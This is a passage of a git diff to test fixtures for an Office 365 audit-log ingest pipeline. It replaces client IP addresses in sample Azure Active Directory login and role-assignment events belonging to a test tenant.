9-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-7
64e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\
"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125407700Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"a
ctorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to 
user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json index f8c6f611239..a3434906831 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json 
@@ -2,7 +2,7 @@
 "events": [
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:13\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"ca0efc24-1b89-4962-8fef-a3ac5437302f\",\"InterSystemsId\":\"03616b3a-fc75-46a1-b34a-2d82fc8f1e7e\",\"IntraSystemId\":\"c4206c29-46c2-4a6f-a46b-735107705400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:13\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"ca0efc24-1b89-4962-8fef-a3ac5437302f\",\"InterSystemsId\":\"03616b3a-fc75-46a1-b34a-2d82fc8f1e7e\",\"IntraSystemId\":\"c4206c29-46c2-4a6f-a46b-735107705400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -20,10 +20,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:13", "ExtendedProperties": [ { 
@@ -73,7 +73,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b53de36d-ea71-4ebf-9b71-feb431bd4eba\",\"InterSystemsId\":\"05d69096-cb90-4690-ae69-8acd5177b3e0\",\"IntraSystemId\":\"ed155e11-60b3-4764-b9aa-05c35f3bb800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b53de36d-ea71-4ebf-9b71-feb431bd4eba\",\"InterSystemsId\":\"05d69096-cb90-4690-ae69-8acd5177b3e0\",\"IntraSystemId\":\"ed155e11-60b3-4764-b9aa-05c35f3bb800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -91,10 +91,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:53:24", "ExtendedProperties": [ { 
@@ -144,7 +144,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"10e2d141-839e-4913-ab3d-6cf1f4856eae\",\"InterSystemsId\":\"0f5eb16e-8b22-49bf-a927-f6f310fd5879\",\"IntraSystemId\":\"6634d05a-72ec-4c27-8e69-03c57b202000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"10e2d141-839e-4913-ab3d-6cf1f4856eae\",\"InterSystemsId\":\"0f5eb16e-8b22-49bf-a927-f6f310fd5879\",\"IntraSystemId\":\"6634d05a-72ec-4c27-8e69-03c57b202000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -162,10 +162,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:29:01", "ExtendedProperties": [ { 
@@ -215,7 +215,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"68b3fd99-0dae-4479-926d-03cc0073dd08\",\"InterSystemsId\":\"1150acae-a48d-4752-8847-7bacb7fe6e6c\",\"IntraSystemId\":\"1809f830-b010-4389-9607-e01ae175ca00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"68b3fd99-0dae-4479-926d-03cc0073dd08\",\"InterSystemsId\":\"1150acae-a48d-4752-8847-7bacb7fe6e6c\",\"IntraSystemId\":\"1809f830-b010-4389-9607-e01ae175ca00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -233,10 +233,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:52:06", "ExtendedProperties": [ { 
